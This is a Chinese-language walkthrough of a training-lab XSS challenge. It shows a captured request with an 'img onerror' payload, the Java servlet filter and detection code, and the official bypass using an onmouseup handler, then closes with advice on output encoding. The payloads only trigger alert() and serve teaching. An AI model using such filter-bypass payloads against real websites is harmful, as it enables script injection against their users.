跳转至

Cross Site Scripting Two(跨站脚本攻击 2)

题介绍

一个XSS攻击点,需要提交一个绕过检查的攻击语句

功能实现

请求数据包

POST /challenges/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888 HTTP/1.1

searchTerm=%3Cimg+src%3D%23+onerror%3Dalert(1)+%3E&csrfToken=22792033228396859635296159069930202705

对应实现代码 src/main/java/servlets/module/challenge/XssChallengeTwo.java

String searchTerm = request.getParameter("searchTerm");
log.debug("User Submitted - " + searchTerm);
searchTerm = XssFilter.levelTwo(searchTerm);
log.debug("After Filtering - " + searchTerm);
String htmlOutput = new String();
if(FindXSS.search(searchTerm))  //调用过滤函数进行过滤 
{
    htmlOutput = "<h2 class='title'>" + bundle.getString("result.wellDone") + "</h2>" +
            "<p>" + bundle.getString("result.youDidIt") + "<br />" +
            bundle.getString("result.resultKey") + " <a>" +
                Hash.generateUserSolution(
                        Getter.getModuleResultFromHash(getServletContext().getRealPath(""), levelHash
                        ), (String)ses.getAttribute("userName")
                )
             +
            "</a>";
    log.debug(levelName + " completed");
}

public static boolean FindXSS.search (String xssString)
    {
        boolean xssDetected = false;
        log.debug("String to Search: " + xssString);

        //Need to tidy submitted string, similar to how a browser would when it interprets it
        Tidy tidy = new Tidy();
        tidy.setXHTML(true);  //进行过滤
        tidy.setQuiet(true);
        tidy.setShowWarnings(false);
        InputStream inputStream = new ByteArrayInputStream(xssString.getBytes());
        ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
        tidy.parseDOM(inputStream, outputStream);
        String tidyHtml = outputStream.toString().toLowerCase();
        try
        {
            outputStream.close();
            inputStream.close();
        }
        catch(Exception e)
        {
            log.error("Could not Cloud Tidy Input/Output Streams: " + e.toString());
        }


如果经过过滤的数据里面仍然存在可以正常执行的alert就认为成功

解题步骤

官方给的答案

<input type="button" onmouseup="alert('XSS')"/>

总结

试图针对XSS攻击的过滤时非常难的,非富文本的情况,尽可能进行编码输出 ,或使用公认的安全库进行操作

Back to top